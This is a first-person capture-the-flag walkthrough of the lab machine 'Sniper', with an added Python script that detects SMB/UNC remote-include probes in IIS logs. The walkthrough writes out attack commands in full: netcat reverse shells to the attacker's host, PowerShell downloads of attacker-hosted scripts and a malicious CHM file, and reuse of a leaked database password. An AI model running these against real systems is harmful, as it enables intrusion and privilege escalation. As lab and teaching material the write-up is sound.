As with any system, I start with a series of port scans, including a -A scan.
root@kalivm:~/Sniper# nmap -A 10.10.10.151 -oN fullscan-A
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-11 09:52 CEST
Nmap scan report for 10.10.10.151
Host is up (0.013s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-11T14:52:34
|_  start_date: N/A

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   13.12 ms 10.10.12.1
2   13.23 ms 10.10.10.151 (10.10.10.151)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.65 seconds
I see that only a few ports are open, including SMB and a web server. After some analysis of the SMB server, I find nothing of immediate interest, so I continue to browse through the web pages.
At one point in the blog, I see a page which accepts a parameter, so I start playing with it. Since it could be vulnerable to inclusion attacks, I start with Local and Remote File Inclusion. After some trial and error I find that neither local nor remote file inclusion works over HTTP, so I continue my search to see if anything else is possible. With this research, I find this link on RFI based on SMB. So I reconfigure my SMB server to have a share called 'sniper' and see if I can replicate what is written in the examples.
After some trial and error, I see my nickname popping up in the source code, indicating that the RFI over SMB has worked. So now it is time to get this webshell and call it through my SMB Server.
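The defender's side of what just happened, as an added example that is not part of the original write-up: the include parameter rejected `http://` URLs but accepted a UNC path, because PHP on Windows opens `\\host\share\file` as an ordinary filesystem path and `allow_url_include` never sees it. The script below parses IIS W3C log lines (constructed sample; the `lang` parameter name is a hypothetical one, the IPs reuse the ones from this box) and flags include parameters that point at another host, whether written as a URL, a backslash UNC path, or a forward-slash UNC path.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C sample (not taken from the original post). The query
# values imitate include-parameter probing: a normal page, an HTTP URL
# (blocked by allow_url_include=Off), and two UNC spellings that PHP on
# Windows treats as plain filesystem paths, which that setting does not cover.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-10-11 07:52:01 10.10.10.151 GET /blog/index.php lang=blog-en.php 10.10.12.78 200
2019-10-11 07:52:09 10.10.10.151 GET /blog/index.php lang=http://10.10.12.78/shell.php 10.10.12.78 200
2019-10-11 07:52:17 10.10.10.151 GET /blog/index.php lang=%5C%5C10.10.12.78%5Csniper%5Cshell.php 10.10.12.78 200
2019-10-11 07:52:25 10.10.10.151 GET /blog/index.php lang=//10.10.12.78/sniper/shell.php 10.10.12.78 200
"""

# A value is "remote" when, after decoding, it starts with a URL scheme,
# a backslash UNC prefix, or a forward-slash UNC prefix, followed by a host
# and a path separator.
REMOTE_RE = re.compile(
    r"^(?:[a-z][a-z0-9+.-]*://|\\\\|//)[^\\/\s]+[\\/]", re.IGNORECASE)


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in #Fields."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def remote_include_hits(text):
    """Return (client ip, parameter name, decoded value) per suspicious parameter."""
    hits = []
    for rec in parse_w3c(text):
        for pair in rec.get("cs-uri-query", "-").split("&"):
            name, _, raw = pair.partition("=")
            # Decode twice so %255C (double-encoded backslash) is caught too.
            value = unquote_plus(unquote_plus(raw))
            if REMOTE_RE.match(value):
                hits.append((rec["c-ip"], name, value))
    return hits
```

The same check belongs in the application itself: resolve the parameter against an allowlist of local files instead of passing it to include().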
The web shell allows me to browse around the file system and invoke commands as if I had an actual shell. After some browsing around in the web root of Sniper, I find a db.php file.
The db.php file contains a username and password; as they may be interesting, I note them for later use and decide that it is time to try to get a proper shell.
So first I use PowerShell to transfer netcat across.
And then I call nc.exe and get a shell on Sniper.
root@kalivm:~/Sniper# nc -nlvp 9003
Listening on 0.0.0.0 9003
Connection received on 10.10.10.151 49707
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\sedje>whoami
whoami
nt authority\iusr

C:\sedje>net users
net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Chris                    DefaultAccount
Guest                    WDAGUtilityAccount
The command completed with one or more errors.
So I got the shell as IUSR, the default IIS user, and there is only one other regular user on the box, called Chris. Maybe the database password is the same as the user's password, so I want to try to use PowerShell to escalate my privileges. After some searching for how I can use the password with a PowerShell command, I came across a script on Stack Overflow and modified it to my needs.
root@kalivm:~/Sniper# cat getshell.ps1
# Credentials found in db.php, tried here as Chris' Windows password
$username = 'SNIPER\Chris'
$password = '36mEAhz/B8xQ~2VM'
# PSCredential needs the password as a SecureString
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
# Open a local PowerShell session as Chris and step into it
New-PSSession -Credential $credential | Enter-PSSession
Again, I use PowerShell to transfer the file and then execute it.
c:\sedje>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\sedje> Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
Invoke-WebRequest "http://10.10.12.78/getshell.ps1" -OutFile c:\sedje\getshell.ps1
PS C:\sedje> ./getshell.ps1
./getshell.ps1
[localhost]: PS C:\Users\Chris\Documents> whoami
whoami
sniper\chris
[localhost]: PS C:\Users\Chris\Documents> dir c:\
dir c:\
[localhost]: PS C:\Users\Chris\Documents>
Now, as user Chris, I found that the shell was not fully functional (note that dir returns nothing), so the next step is to see if I can at least get a shell back to my Kali box.
[localhost]: PS C:\Users\Chris\Documents> c:\sedje\nc.exe 10.10.12.78 9002 -e powershell
c:\sedje\nc.exe 10.10.12.78 9002 -e powershell
And in another terminal I have started a listener.
root@kalivm:~/Sniper# nc -nlvp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.151 49755
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Chris\Documents> type ../Desktop/user.txt
type ../Desktop/user.txt
21f4d0f29<NOFLAG>500c1ad716cf56e
So now I have a fully functional shell and can grab the flag!
After some browsing through Chris' home directory and its subdirectories, I found a file that was interesting.
PS C:\Users\Chris> dir Downloads
dir Downloads

    Directory: C:\Users\Chris\Downloads

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   8:36 AM          10462 instructions.chm
A Compiled HTML Help file; those are not commonly used anymore as far as I know, so this could be interesting. After some further searching on the system, I also encountered something in the Docs directory in the root of the C:\ drive.
PS C:\> dir Docs
dir Docs

    Directory: C:\Docs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/11/2019   9:31 AM            285 note.txt
-a----        4/11/2019   9:17 AM         552607 php for dummies-trial.pdf

PS C:\> cd Docs
cd Docs
PS C:\Docs> type note.txt
type note.txt
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
So apparently the instructions.chm file is what Chris has to prepare for the CEO and then drop into this directory. After talking to some people on Discord, I got a link to this very useful guide on how to create a malicious CHM file. One unfortunate thing about this approach is that it requires a Windows machine, so I had to set up a VM with an evaluation version of Windows to run the HTML Help Workshop tool. Anyway, after doing so, it was a matter of starting a new project.
Simply clicking Next, Next, and Finish.
And then adding an HTML file with a malicious payload in it. After some testing and compiling I got the right payload.
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\sedje\sedje.chm

Compile time: 0 minutes, 0 seconds
1        Topic
0        Local links
0        Internet links
0        Graphics

Created c:\Users\sedje\sedje.chm, 10,624 bytes
Compression increased file by 10,078 bytes.
After compiling the latest version with a working payload in HTML Help Workshop, it responds with this message stating that compilation completed and the CHM file was created. So I transfer it back to my Kali machine so that I can pick it up again with PowerShell from Sniper.
PS C:\Docs> Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm
Invoke-WebRequest "http://10.10.12.78/sedje.chm" -Outfile c:\Docs\instructions.chm
From the Sniper host, I do an Invoke-WebRequest again to download the CHM file to the required directory, while having a netcat listener waiting for the shell to pop.
root@kalivm:~/Sniper# nc -nlvp 9005
Listening on 0.0.0.0 9005
Connection received on 10.10.10.151 53736
Microsoft Windows [Version 10.0.17763.678]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
sniper\administrator

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt
5624caf363<NOFLAG>4f6be0b7436c15
The shell pops and I get my root flag!